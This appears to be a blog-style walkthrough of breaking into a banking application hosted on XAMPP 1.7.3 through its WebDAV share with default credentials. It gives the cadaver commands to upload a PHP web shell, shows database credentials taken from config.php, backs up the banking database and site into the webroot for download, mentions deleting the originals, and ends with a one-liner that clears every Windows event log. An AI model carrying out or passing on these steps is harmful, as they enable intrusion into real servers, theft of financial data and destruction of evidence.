Due to the increase in Web Application Exfiltration of data it would be prudent to show a simple scenario that would have this kind of attack suffice; This is to show a vulnerability within webdav service on xampp 1.7.3. Let’s assume the setup below as a simple lab:
- A banking system application in PHP hosted on XAMPP 1.7.3 as the webserver
- Microsoft SQL for the Backend
- Windows Server for the operating system
For all XAMPP before 1.7.4 there’s a webdav service that comes with it. In order to test availability of the service just add /webdav to the root of the webserver. For the purposes of this instance our target will be named:
http://xampp-heisted.com/ (Not original target’s name)
Therefore to test for the attack on our target will be:
http://xampp-heisted.com/webdav
The webdav share has default credentials which are:
username: wampp
password: xampp
We use cadaver since we are on linux, (on windows there are a couple of webdav tools too) to login and then use the put command to upload a shell. In this case a PHP shell as it is XAMPP.
command in this case was:
cadaver http://xampp-heisted.com/webdav/
if behind a proxy add -p and specify the proxy:port
It will ask for credentials then input the above given default ones.
once logged in the response the console will be as below:
dav:/webdav/>
We next check that we are logged in to the right resource using pwd (Print Working Directory)
dav:/webdav/>pwd
Current collection is `http://xampp-heisted.com/webdav/`
Next we need to upload our shell in order to ensure that we can see the files in the webroot and manage databases locally. This will vary based on the shell you use. Some like c99, devil shell etc are seen by antiviruses due to unsafe methods. You can write your own shell or get an alternative if this is the case. To upload a shell we use the put command inside the dav console. Mine is as below:
dav:/webdav/>put /home/alienwithin/shells/alien-shell.php
Uploading /home/alienwithin/shells/alien-shell.php to `/webdav/alien-shell.php`
Progress: [=======================================>] 100.0% of 156 bytes Succeeded.
Let’s access our shell it’s now located at:
http://xampp-heisted.com/webdav/alien-shell.php
Now to complete the Application heist we move up one directory into htdocs , the hard work is done. My Target is using MSSQL as the DBMS instead of the regular MySQL and PHP for the coding language. We get the database credentials:
MSSQL is not as easy to backup as is the case with MySQL but not impossible. We need to prove that the heist is possible.
So I find the credentials in a file called config.php
$this->host = ‘10.3.xxx.xxx’; // live
$this->sqlname = ‘badmin’; # mssql login
$this->sqlpw = ‘pass123*’; # mssql password
$this->sqldb = ‘bankingsystem’; # mssql database
Since we are dealing with MSSQL Databases. It is good to use adminer.php which i upload using the webdav share and login using the credentials above.
In order to backup we need to find the location of all databases in order to create backup files we run a query in adminer:
SELECT name, physical_name AS current_file_location FROM sys.master_files
We get a response:
name current_file_location
master C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\master.mdf
mastlog C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
tempdev C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
templog C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\templog.ldf
modeldev C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\model.mdf
modellog C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\modellog.ldf
MSDBData C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
MSDBLog C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
ReportServer C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\ReportServer.mdf
ReportServer_log C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\ReportServer_log.LDF
ReportServerTempDB C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\ReportServerTempDB.mdf
ReportServerTempDB_log C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\ReportServerTempDB_log.LDF
bankingsystem E:\Databases\bankingsystem.mdf
bankingsystem_log E:\DatabaseLogs\bankingsystem_log.ldf
Now the last two are important to us:
So to backup to the webroot so that we download we use the command below in adminer:
BACKUP DATABASE bankingsystem TO DISK=’C:\xampp\htdocs\bankingsystem.bak’
Next we backup the site and for this i simply used winrar command line in the first shell to rar the htdocs folder in itself:
rar a -r C:\xampp\htdocs\bankingsystem.rar *.* C:\xampp\htdocs\
From here we download the application and database to our machine:
http://xampp-heisted.com/bankingsystem.rar
Technically when exfiltration is done unethically the application and databases would be cleared from the system to slow down the businesses recovery and the original is deleted.
In this case an attacker would then try to clear their tracks by clearing windows events logs iteratively:
for /f %x in (‘wevtutil el’) do wevtutil cl “%x”
Response should be similar to below: (not all logs put here , its a big list)
C:\xampp\webdav>wevtutil cl “Analytic”
C:\xampp\webdav>wevtutil cl “Application”
C:\xampp\webdav>wevtutil cl “DebugChannel”
C:\xampp\webdav>wevtutil cl “DirectShowFilterGraph”
C:\xampp\webdav>wevtutil cl “DirectShowPluginControl”
C:\xampp\webdav>wevtutil cl “EndpointMapper”
C:\xampp\webdav>wevtutil cl “ForwardedEvents”
C:\xampp\webdav>wevtutil cl “HardwareEvents”
C:\xampp\webdav>wevtutil cl “Internet”
C:\xampp\webdav>wevtutil cl “Key”
C:\xampp\webdav>wevtutil cl “MSExchange”
****trimmed output****